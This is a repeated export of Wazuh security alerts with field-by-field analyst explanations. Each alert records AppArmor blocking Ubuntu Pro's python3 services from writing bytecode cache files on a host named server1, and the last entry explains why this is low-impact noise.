🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.6364
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.541946+00:00 server1 kernel: audit: type=1400 audit(1745533322.540:1027): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/exceptions.cpython-312.pyc.124504253410736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.541946+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). A quick way to separate failed attempts (e.g. brute force) from successes.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.6999
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.548927+00:00 server1 kernel: audit: type=1400 audit(1745533322.547:1028): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_apt_news" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/apt.cpython-312.pyc.132628381801856" pid=76916 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.548927+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). A quick way to separate failed attempts (e.g. brute force) from successes.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.7626
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.576996+00:00 server1 kernel: audit: type=1400 audit(1745533322.575:1030): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/messages/__pycache__/urls.cpython-312.pyc.124504252186160" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.576996+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). A quick way to separate failed attempts (e.g. brute force) from successes.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.8264
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.448985+00:00 server1 kernel: audit: type=1400 audit(1745533322.445:1022): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/log.cpython-312.pyc.124504258771216" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.448985+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). A quick way to separate failed attempts (e.g. brute force) from successes.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.8894
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.473370+00:00 server1 kernel: audit: type=1400 audit(1745533322.471:1024): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/secret_manager.cpython-312.pyc.124504252962736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.473370+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). A quick way to separate failed attempts (e.g. brute force) from successes.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.9535
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.440199+00:00 server1 kernel: audit: type=1400 audit(1745533322.436:1021): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/__init__.cpython-312.pyc.124504254074288" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.440199+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). A quick way to separate failed attempts (e.g. brute force) from successes.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.10170
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.495638+00:00 server1 kernel: audit: type=1400 audit(1745533322.493:1025): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_apt_news" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/__init__.cpython-312.pyc.132628381628208" pid=76916 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.495638+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). A quick way to separate failed attempts (e.g. brute force) from successes.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.10805
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.470997+00:00 server1 kernel: audit: type=1400 audit(1745533322.469:1023): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/defaults.cpython-312.pyc.124504252962736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.470997+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). A quick way to separate failed attempts (e.g. brute force) from successes.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.11441
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.508884+00:00 server1 kernel: audit: type=1400 audit(1745533322.503:1026): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/system.cpython-312.pyc.124504252964784" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.508884+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). A quick way to separate failed attempts (e.g. brute force) from successes.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.12075
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.548927+00:00 server1 kernel: audit: type=1400 audit(1745533322.547:1028): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_apt_news" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/apt.cpython-312.pyc.132628381801856" pid=76916 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.548927+00:00
Timestamp the predecoder lifted from the syslog header of the raw line, i.e. when the kernel logged it; the top‑level timestamp above is when the manager processed it. The gap between the two is ingestion lag and should stay in the milliseconds.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
AppArmor's decision for this access. DENIED means the confined process was actually blocked; ALLOWED (profile in complain mode) or AUDIT (permitted but audited) would mean the access went through and was only logged.

data.extra_data:  mknod
For AppArmor events the decoder stores the operation here. mknod with requested_mask="c" is a plain file create, and the target is a Python bytecode cache temp file (importlib writes <module>.pyc.<id> and renames it into place), so profile ubuntu_pro_apt_news is stopping its confined python3 from caching bytecode under /usr/lib/python3. A blocked, low‑impact write by a system service; confirm that profile, comm and path fit this pattern before closing it as noise.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

